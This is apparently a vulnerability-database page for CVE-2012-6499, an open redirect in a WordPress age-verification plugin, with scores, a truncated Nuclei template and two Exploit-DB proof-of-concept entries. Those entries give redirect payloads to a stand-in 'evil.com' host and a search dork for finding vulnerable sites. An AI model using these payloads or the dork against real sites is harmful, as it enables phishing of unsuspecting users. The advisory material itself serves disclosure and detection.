CVE-2012-6499
published 2013-01-12CVE-2012-6499: Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to…
PriorityP428medium5.8CVSS 2.0
AVNACMAuNCPIPAN
EXPLOIT
EPSS
10.60%
95.2th percentile
Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| age_verification_project | age_verification | <= 0.4 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin Age Verification 0.4 - 'redirect_to' Open Redirection
exploitdb·2012-01-10
CVE-2012-6499 WordPress Plugin Age Verification 0.4 - 'redirect_to' Open Redirection
WordPress Plugin Age Verification 0.4 - 'redirect_to' Open Redirection
---
source: https://www.securityfocus.com/bid/51357/info
WordPress Age Verification plugin is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
A successful exploit may aid in phishing attacks; other attacks are possible.
WordPress Age Verification plugin 0.4 and prior versions are vulnerable.
http://www.example.com/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com
Exploit-DB
WordPress Plugin Age Verification 0.4 - Open Redirect
exploitdb·2012-01-10
CVE-2012-6499 WordPress Plugin Age Verification 0.4 - Open Redirect
WordPress Plugin Age Verification 0.4 - Open Redirect
---
# Exploit Title: Wordpress Age Verification plugin <= 0.4 Open Redirect
# Date: 2012/01/10
# Dork: inurl:wp-content/plugins/age-verification/age-verification.php
# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/age-verification.zip
# Version: 0.4
1) Via GET: http://server/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com
The rendered page will provide a link to http://www.evil.com
2) Via POST: http://server/wp-content/plugins/age-verification/age-verification.php
redirect_to: http://www.evil.com
age_day: 1
age_month: 1
age_year: 1970
Direct redirect to http://www.evil.com
Nuclei
WordPress Plugin Age Verification v0.4 - Open Redirect
nuclei·CVSS 5.8
CVE-2012-6499 [MEDIUM] WordPress Plugin Age Verification v0.4 - Open Redirect
WordPress Plugin Age Verification v0.4 - Open Redirect
Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter.
Template:
id: CVE-2012-6499
info:
name: WordPress Plugin Age Verification v0.4 - Open Redirect
author: ctflearner
severity: medium
description: |
Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter.
impact: |
An attacker can exploit this vulnerability to redirect users to malicious websites, leading
2013-01-12
Published